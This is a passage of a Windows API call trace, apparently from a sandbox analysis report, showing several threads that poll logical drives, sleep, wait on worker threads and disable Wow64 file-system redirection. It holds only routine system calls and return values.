	[0162.480] Sleep (dwMilliseconds=0x64) 
	[0162.624] GetLogicalDrives () returned 0x4
	[0162.624] Sleep (dwMilliseconds=0x64) 
	[0162.903] GetLogicalDrives () returned 0x4
	[0162.903] Sleep (dwMilliseconds=0x64) 
	[0163.382] GetLogicalDrives () returned 0x4
	[0163.382] Sleep (dwMilliseconds=0x64) 
	[0163.641] GetLogicalDrives () returned 0x4
	[0163.641] Sleep (dwMilliseconds=0x64) 
	[0164.057] GetLogicalDrives () returned 0x4
	[0164.057] Sleep (dwMilliseconds=0x64) 
	[0164.199] GetLogicalDrives () returned 0x4
	[0164.199] Sleep (dwMilliseconds=0x64) 
	[0164.540] GetLogicalDrives () returned 0x4
	[0164.541] Sleep (dwMilliseconds=0x64) 
	[0164.708] GetLogicalDrives () returned 0x4
	[0164.709] Sleep (dwMilliseconds=0x64) 
	[0164.885] GetLogicalDrives () returned 0x4
	[0164.886] Sleep (dwMilliseconds=0x64) 
	[0165.222] GetLogicalDrives () returned 0x4
	[0165.222] Sleep (dwMilliseconds=0x64) 
	[0165.565] GetLogicalDrives () returned 0x4
	[0165.565] Sleep (dwMilliseconds=0x64) 
	[0165.704] GetLogicalDrives () returned 0x4
	[0165.705] Sleep (dwMilliseconds=0x64) 
	[0166.158] GetLogicalDrives () returned 0x4
	[0166.158] Sleep (dwMilliseconds=0x64) 
	[0166.316] GetLogicalDrives () returned 0x4
	[0166.316] Sleep (dwMilliseconds=0x64) 
	[0166.446] GetLogicalDrives () returned 0x4
	[0166.446] Sleep (dwMilliseconds=0x64) 
	[0166.557] GetLogicalDrives () returned 0x4
	[0166.557] Sleep (dwMilliseconds=0x64) 
	[0166.799] GetLogicalDrives () returned 0x4
	[0166.799] Sleep (dwMilliseconds=0x64) 
	[0167.126] GetLogicalDrives () returned 0x4
	[0167.126] Sleep (dwMilliseconds=0x64) 
	[0167.232] GetLogicalDrives () returned 0x4
	[0167.233] Sleep (dwMilliseconds=0x64) 
	[0167.335] GetLogicalDrives () returned 0x4
	[0167.335] Sleep (dwMilliseconds=0x64) 
	[0167.446] GetLogicalDrives () returned 0x4
	[0167.446] Sleep (dwMilliseconds=0x64) 
	[0167.610] GetLogicalDrives () returned 0x4
	[0167.610] Sleep (dwMilliseconds=0x64) 
	[0167.731] GetLogicalDrives () returned 0x4
	[0167.731] Sleep (dwMilliseconds=0x64) 
	[0167.860] GetLogicalDrives () returned 0x4
	[0167.860] Sleep (dwMilliseconds=0x64) 
	[0168.051] GetLogicalDrives () returned 0x4
	[0168.051] Sleep (dwMilliseconds=0x64) 
	[0168.198] GetLogicalDrives () returned 0x4
	[0168.198] Sleep (dwMilliseconds=0x64) 
	[0168.312] GetLogicalDrives () returned 0x4
	[0168.312] Sleep (dwMilliseconds=0x64) 
	[0168.432] GetLogicalDrives () returned 0x4
	[0168.432] Sleep (dwMilliseconds=0x64) 
	[0168.537] GetLogicalDrives () returned 0x4
	[0168.537] Sleep (dwMilliseconds=0x64) 
	[0168.791] GetLogicalDrives () returned 0x4
	[0168.791] Sleep (dwMilliseconds=0x64) 
	[0168.889] GetLogicalDrives () returned 0x4
	[0168.889] Sleep (dwMilliseconds=0x64) 
	[0169.244] GetLogicalDrives () returned 0x4
	[0169.244] Sleep (dwMilliseconds=0x64) 
	[0169.459] GetLogicalDrives () returned 0x4
	[0169.459] Sleep (dwMilliseconds=0x64) 
	[0169.635] GetLogicalDrives () returned 0x4
	[0169.635] Sleep (dwMilliseconds=0x64) 
	[0169.823] GetLogicalDrives () returned 0x4
	[0169.823] Sleep (dwMilliseconds=0x64) 
	[0170.080] GetLogicalDrives () returned 0x4
	[0170.080] Sleep (dwMilliseconds=0x64) 
	[0170.197] GetLogicalDrives () returned 0x4
	[0170.197] Sleep (dwMilliseconds=0x64) 
	[0170.426] GetLogicalDrives () returned 0x4
	[0170.426] Sleep (dwMilliseconds=0x64) 
	[0170.592] GetLogicalDrives () returned 0x4
	[0170.592] Sleep (dwMilliseconds=0x64) 
	[0170.739] GetLogicalDrives () returned 0x4
	[0170.739] Sleep (dwMilliseconds=0x64) 
	[0170.929] GetLogicalDrives () returned 0x4
	[0170.929] Sleep (dwMilliseconds=0x64) 
	[0171.273] GetLogicalDrives () returned 0x4
	[0171.273] Sleep (dwMilliseconds=0x64) 
	[0171.585] GetLogicalDrives () returned 0x4
	[0171.585] Sleep (dwMilliseconds=0x64) 
	[0171.756] GetLogicalDrives () returned 0x4
	[0171.757] Sleep (dwMilliseconds=0x64) 

Thread:
	id = 51
	os_tid = 0x74c


Thread:
	id = 52
	os_tid = 0x750

	[0137.354] GetTickCount () returned 0x1133fa0
	[0137.354] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x24) returned 0x7b60170
	[0137.354] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x7b60170, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x150
	[0137.355] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x7b60170, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x158
	[0137.357] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x7b60170, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x15c
	[0137.358] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x7b60170, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x164
	[0137.360] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7bae770
	[0137.360] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7bae770, Size=0x20) returned 0x7b43320
	[0137.360] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7bae770
	[0137.360] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7bae770, Size=0x20) returned 0x7b43348
	[0137.360] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77080000
	[0137.376] GetProcAddress (hModule=0x77080000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x770ad650
	[0137.376] Wow64DisableWow64FsRedirection (in: OldValue=0x9f4ff84 | out: OldValue=0x9f4ff84*=0x0) returned 1
	[0137.376] lstrlenW (lpString="kernel32.dll") returned 12
	[0137.376] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b43320 | out: hHeap=0x7ab0000) returned 1
	[0137.376] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0137.376] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b43348 | out: hHeap=0x7ab0000) returned 1
	[0137.376] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x7b48528, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x178
	[0137.386] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0137.568] GetTickCount () returned 0x113407a
	[0137.568] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0137.774] GetTickCount () returned 0x1134145
	[0137.775] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0137.896] GetTickCount () returned 0x11341c2
	[0137.896] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0138.059] GetTickCount () returned 0x113425e
	[0138.059] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0138.293] GetTickCount () returned 0x1134348
	[0138.293] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0138.605] GetTickCount () returned 0x1134470
	[0138.605] GetTickCount () returned 0x1134470
	[0138.605] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0138.798] GetTickCount () returned 0x113452b
	[0138.798] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0138.916] GetTickCount () returned 0x11345a8
	[0138.916] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0139.094] GetTickCount () returned 0x1134654
	[0139.094] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0139.256] GetTickCount () returned 0x11346ff
	[0139.256] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0139.524] GetTickCount () returned 0x1134809
	[0139.524] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0139.631] GetTickCount () returned 0x1134876
	[0139.631] GetTickCount () returned 0x1134876
	[0139.631] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0139.740] GetTickCount () returned 0x11348e3
	[0139.740] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0140.004] GetTickCount () returned 0x11349ec
	[0140.004] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0140.272] GetTickCount () returned 0x1134af5
	[0140.272] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0140.407] GetTickCount () returned 0x1134b82
	[0140.408] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0140.617] GetTickCount () returned 0x1134c4d
	[0140.617] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0140.899] GetTickCount () returned 0x1134d65
	[0140.899] GetTickCount () returned 0x1134d65
	[0140.899] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0141.177] GetTickCount () returned 0x1134e7e
	[0141.177] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0141.347] GetTickCount () returned 0x1134f2a
	[0141.347] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0141.493] GetTickCount () returned 0x1134fb6
	[0141.493] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0141.850] GetTickCount () returned 0x113511d
	[0141.850] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0142.067] GetTickCount () returned 0x11351f7
	[0142.067] GetTickCount () returned 0x11351f7
	[0142.067] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0142.382] GetTickCount () returned 0x113532f
	[0142.382] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0142.489] GetTickCount () returned 0x113539d
	[0142.489] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0142.701] GetTickCount () returned 0x1135477
	[0142.710] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0142.923] GetTickCount () returned 0x1135551
	[0142.923] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0143.198] GetTickCount () returned 0x113565b
	[0143.198] GetTickCount () returned 0x113565b
	[0143.198] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0143.371] GetTickCount () returned 0x1135706
	[0143.371] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0143.731] GetTickCount () returned 0x113587d
	[0143.732] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0143.907] GetTickCount () returned 0x1135928
	[0143.907] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0144.294] GetTickCount () returned 0x1135aae
	[0144.294] GetTickCount () returned 0x1135aae
	[0144.294] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0144.696] GetTickCount () returned 0x1135c34
	[0144.696] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0145.179] GetTickCount () returned 0x1135e18
	[0145.179] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0145.482] GetTickCount () returned 0x1135f50
	[0145.482] GetTickCount () returned 0x1135f50
	[0145.482] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0145.627] GetTickCount () returned 0x1135fdc
	[0145.627] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0146.039] GetTickCount () returned 0x1136181
	[0146.039] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0146.352] GetTickCount () returned 0x11362b9
	[0146.352] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0146.648] GetTickCount () returned 0x11363e2
	[0146.648] GetTickCount () returned 0x11363e2
	[0146.648] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0146.994] GetTickCount () returned 0x1136539
	[0146.994] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0147.339] GetTickCount () returned 0x1136690
	[0147.339] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0147.590] GetTickCount () returned 0x113678a
	[0147.590] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0147.990] GetTickCount () returned 0x113691f
	[0147.990] GetTickCount () returned 0x113691f
	[0147.990] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0148.193] GetTickCount () returned 0x11369ea
	[0148.193] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0148.644] GetTickCount () returned 0x1136b9f
	[0148.644] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0148.898] GetTickCount () returned 0x1136ca8
	[0148.898] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0149.360] GetTickCount () returned 0x1136e6d
	[0149.360] GetTickCount () returned 0x1136e6d
	[0149.360] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0149.596] GetTickCount () returned 0x1136f66
	[0149.596] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0149.807] GetTickCount () returned 0x1137031
	[0149.807] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0149.942] GetTickCount () returned 0x11370bd
	[0149.942] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0150.118] GetTickCount () returned 0x1137169
	[0150.118] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0150.328] GetTickCount () returned 0x1137234
	[0150.328] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0150.839] GetTickCount () returned 0x1137437
	[0150.839] GetTickCount () returned 0x1137437
	[0150.839] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0151.923] GetTickCount () returned 0x113787b
	[0151.923] GetTickCount () returned 0x113787b
	[0151.923] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0152.257] GetTickCount () returned 0x11379c2
	[0152.257] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0153.091] GetTickCount () returned 0x1137d0d
	[0153.091] GetTickCount () returned 0x1137d0d
	[0153.091] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0153.337] GetTickCount () returned 0x1137df7
	[0153.337] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0153.627] GetTickCount () returned 0x1137f1f
	[0153.627] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0154.144] GetTickCount () returned 0x1138122
	[0154.144] GetTickCount () returned 0x1138122
	[0154.144] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0154.361] GetTickCount () returned 0x11381fc
	[0154.361] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0154.494] GetTickCount () returned 0x1138289
	[0154.494] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0154.952] GetTickCount () returned 0x113844d
	[0154.952] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0155.278] GetTickCount () returned 0x1138595
	[0155.278] GetTickCount () returned 0x1138595
	[0155.278] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0155.578] GetTickCount () returned 0x11386bd
	[0155.578] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0155.854] GetTickCount () returned 0x11387d6
	[0155.854] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0156.033] GetTickCount () returned 0x1138881
	[0156.033] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0156.517] GetTickCount () returned 0x1138a65
	[0156.517] GetTickCount () returned 0x1138a65
	[0156.517] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0156.749] GetTickCount () returned 0x1138b4f
	[0156.749] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0156.903] GetTickCount () returned 0x1138beb
	[0156.903] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0157.322] GetTickCount () returned 0x1138d90
	[0157.322] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0157.584] GetTickCount () returned 0x1138e99
	[0157.584] GetTickCount () returned 0x1138e99
	[0157.584] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0157.857] GetTickCount () returned 0x1138fa3
	[0157.857] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0158.080] GetTickCount () returned 0x113907d
	[0158.080] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x102
	[0158.306] GetTickCount () returned 0x1139167
	[0158.306] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x64) returned 0x0
	[0158.306] GetTickCount () returned 0x1139167
	[0158.306] Sleep (dwMilliseconds=0x64) 
	[0158.617] GetTickCount () returned 0x113929f
	[0158.617] GetTickCount () returned 0x113929f
	[0158.617] Sleep (dwMilliseconds=0x64) 
	[0158.826] GetTickCount () returned 0x113936a
	[0158.826] Sleep (dwMilliseconds=0x64) 
	[0159.404] GetTickCount () returned 0x11395ab
	[0159.404] Sleep (dwMilliseconds=0x64) 
	[0159.609] GetTickCount () returned 0x1139676
	[0159.609] Sleep (dwMilliseconds=0x64) 
	[0159.927] GetTickCount () returned 0x11397bd
	[0159.927] GetTickCount () returned 0x11397bd
	[0159.927] Sleep (dwMilliseconds=0x64) 
	[0160.153] GetTickCount () returned 0x1139898
	[0160.153] Sleep (dwMilliseconds=0x64) 
	[0160.442] GetTickCount () returned 0x11399c0
	[0160.442] Sleep (dwMilliseconds=0x64) 
	[0160.871] GetTickCount () returned 0x1139b65
	[0160.871] Sleep (dwMilliseconds=0x64) 
	[0161.493] GetTickCount () returned 0x1139dd6
	[0161.493] GetTickCount () returned 0x1139dd6
	[0161.493] Sleep (dwMilliseconds=0x64) 
	[0162.171] GetTickCount () returned 0x113a084
	[0162.171] Sleep (dwMilliseconds=0x64) 
	[0162.457] GetTickCount () returned 0x113a19d
	[0162.457] Sleep (dwMilliseconds=0x64) 
	[0162.624] GetTickCount () returned 0x113a248
	[0162.624] GetTickCount () returned 0x113a248
	[0162.624] Sleep (dwMilliseconds=0x64) 
	[0162.903] GetTickCount () returned 0x113a361
	[0162.903] Sleep (dwMilliseconds=0x64) 
	[0163.382] GetTickCount () returned 0x113a535
	[0163.382] Sleep (dwMilliseconds=0x64) 
	[0163.640] GetTickCount () returned 0x113a63e
	[0163.640] GetTickCount () returned 0x113a63e
	[0163.641] Sleep (dwMilliseconds=0x64) 
	[0164.057] GetTickCount () returned 0x113a7e4
	[0164.057] Sleep (dwMilliseconds=0x64) 
	[0164.199] GetTickCount () returned 0x113a870
	[0164.199] Sleep (dwMilliseconds=0x64) 
	[0164.540] GetTickCount () returned 0x113a9b8
	[0164.540] Sleep (dwMilliseconds=0x64) 
	[0164.708] GetTickCount () returned 0x113aa63
	[0164.708] GetTickCount () returned 0x113aa63
	[0164.708] Sleep (dwMilliseconds=0x64) 
	[0164.885] GetTickCount () returned 0x113ab1e
	[0164.885] Sleep (dwMilliseconds=0x64) 
	[0165.221] GetTickCount () returned 0x113ac66
	[0165.221] Sleep (dwMilliseconds=0x64) 
	[0165.564] GetTickCount () returned 0x113adbd
	[0165.564] Sleep (dwMilliseconds=0x64) 
	[0165.704] GetTickCount () returned 0x113ae4a
	[0165.704] Sleep (dwMilliseconds=0x64) 
	[0166.158] GetTickCount () returned 0x113b00e
	[0166.158] GetTickCount () returned 0x113b00e
	[0166.158] Sleep (dwMilliseconds=0x64) 
	[0166.315] GetTickCount () returned 0x113b0aa
	[0166.315] Sleep (dwMilliseconds=0x64) 
	[0166.446] GetTickCount () returned 0x113b136
	[0166.446] Sleep (dwMilliseconds=0x64) 
	[0166.557] GetTickCount () returned 0x113b1a4
	[0166.557] Sleep (dwMilliseconds=0x64) 
	[0166.799] GetTickCount () returned 0x113b28e
	[0166.799] Sleep (dwMilliseconds=0x64) 
	[0167.126] GetTickCount () returned 0x113b3d5
	[0167.126] Sleep (dwMilliseconds=0x64) 
	[0167.232] GetTickCount () returned 0x113b442
	[0167.232] GetTickCount () returned 0x113b442
	[0167.232] Sleep (dwMilliseconds=0x64) 
	[0167.334] GetTickCount () returned 0x113b4b0
	[0167.334] Sleep (dwMilliseconds=0x64) 
	[0167.445] GetTickCount () returned 0x113b51d
	[0167.445] Sleep (dwMilliseconds=0x64) 
	[0167.609] GetTickCount () returned 0x113b5c8
	[0167.609] Sleep (dwMilliseconds=0x64) 
	[0167.731] GetTickCount () returned 0x113b636
	[0167.731] Sleep (dwMilliseconds=0x64) 
	[0167.860] GetTickCount () returned 0x113b6b2
	[0167.860] Sleep (dwMilliseconds=0x64) 
	[0168.050] GetTickCount () returned 0x113b76e
	[0168.050] Sleep (dwMilliseconds=0x64) 
	[0168.198] GetTickCount () returned 0x113b80a
	[0168.198] Sleep (dwMilliseconds=0x64) 
	[0168.311] GetTickCount () returned 0x113b877
	[0168.311] GetTickCount () returned 0x113b877
	[0168.311] Sleep (dwMilliseconds=0x64) 
	[0168.432] GetTickCount () returned 0x113b8e4
	[0168.432] Sleep (dwMilliseconds=0x64) 
	[0168.537] GetTickCount () returned 0x113b951
	[0168.537] Sleep (dwMilliseconds=0x64) 
	[0168.791] GetTickCount () returned 0x113ba4b
	[0168.791] Sleep (dwMilliseconds=0x64) 
	[0168.889] GetTickCount () returned 0x113bab8
	[0168.889] Sleep (dwMilliseconds=0x64) 
	[0169.244] GetTickCount () returned 0x113bc0f
	[0169.244] Sleep (dwMilliseconds=0x64) 
	[0169.367] GetTickCount () returned 0x113bc8c
	[0169.367] GetTickCount () returned 0x113bc8c
	[0169.367] Sleep (dwMilliseconds=0x64) 
	[0169.629] GetTickCount () returned 0x113bd95
	[0169.629] Sleep (dwMilliseconds=0x64) 
	[0169.822] GetTickCount () returned 0x113be60
	[0169.822] Sleep (dwMilliseconds=0x64) 
	[0170.079] GetTickCount () returned 0x113bf5a
	[0170.079] Sleep (dwMilliseconds=0x64) 
	[0170.198] GetTickCount () returned 0x113bfd6
	[0170.198] Sleep (dwMilliseconds=0x64) 
	[0170.427] GetTickCount () returned 0x113c0b1
	[0170.427] GetTickCount () returned 0x113c0b1
	[0170.427] Sleep (dwMilliseconds=0x64) 
	[0170.592] GetTickCount () returned 0x113c15c
	[0170.592] Sleep (dwMilliseconds=0x64) 
	[0170.740] GetTickCount () returned 0x113c1e9
	[0170.740] Sleep (dwMilliseconds=0x64) 
	[0170.929] GetTickCount () returned 0x113c2a4
	[0170.929] Sleep (dwMilliseconds=0x64) 
	[0171.273] GetTickCount () returned 0x113c40b
	[0171.273] Sleep (dwMilliseconds=0x64) 
	[0171.573] GetTickCount () returned 0x113c533
	[0171.573] GetTickCount () returned 0x113c533
	[0171.573] Sleep (dwMilliseconds=0x64) 
	[0171.756] GetTickCount () returned 0x113c5ee
	[0171.756] Sleep (dwMilliseconds=0x64) 

Thread:
	id = 54
	os_tid = 0x764

	[0137.386] GetTickCount () returned 0x1133fbf
	[0137.386] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x24) returned 0x7baef78
	[0137.386] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x7baef78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x198
	[0137.387] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x7baef78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x19c
	[0137.387] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x7baef78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a0
	[0137.388] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x7baef78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a4
	[0137.389] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7bae8f0
	[0137.389] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7bae8f0, Size=0x20) returned 0x7b43460
	[0137.389] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7bae8f0
	[0137.389] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7bae8f0, Size=0x20) returned 0x7b43488
	[0137.389] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77080000
	[0137.389] GetProcAddress (hModule=0x77080000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x770ad650
	[0137.389] Wow64DisableWow64FsRedirection (in: OldValue=0xa18ff84 | out: OldValue=0xa18ff84*=0x0) returned 1
	[0137.389] lstrlenW (lpString="kernel32.dll") returned 12
	[0137.389] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b43460 | out: hHeap=0x7ab0000) returned 1
	[0137.389] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0137.389] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b43488 | out: hHeap=0x7ab0000) returned 1
	[0137.389] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x7b8b970, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8
	[0137.390] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0137.568] GetTickCount () returned 0x113407a
	[0137.568] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0137.775] GetTickCount () returned 0x1134145
	[0137.775] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0137.896] GetTickCount () returned 0x11341c2
	[0137.896] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0138.060] GetTickCount () returned 0x113425e
	[0138.060] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0138.293] GetTickCount () returned 0x1134348
	[0138.293] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0138.605] GetTickCount () returned 0x1134470
	[0138.605] GetTickCount () returned 0x1134470
	[0138.606] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0138.798] GetTickCount () returned 0x113452b
	[0138.798] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0138.916] GetTickCount () returned 0x11345a8
	[0138.916] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0139.095] GetTickCount () returned 0x1134654
	[0139.095] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0139.256] GetTickCount () returned 0x11346ff
	[0139.256] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0139.524] GetTickCount () returned 0x1134809
	[0139.524] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0139.631] GetTickCount () returned 0x1134876
	[0139.631] GetTickCount () returned 0x1134876
	[0139.631] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0139.740] GetTickCount () returned 0x11348e3
	[0139.740] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0140.004] GetTickCount () returned 0x11349ec
	[0140.004] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0140.272] GetTickCount () returned 0x1134af5
	[0140.272] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0140.408] GetTickCount () returned 0x1134b82
	[0140.408] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0140.617] GetTickCount () returned 0x1134c4d
	[0140.617] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x64) returned 0x102
	[0140.899] GetTickCount () returned 0x1134d65
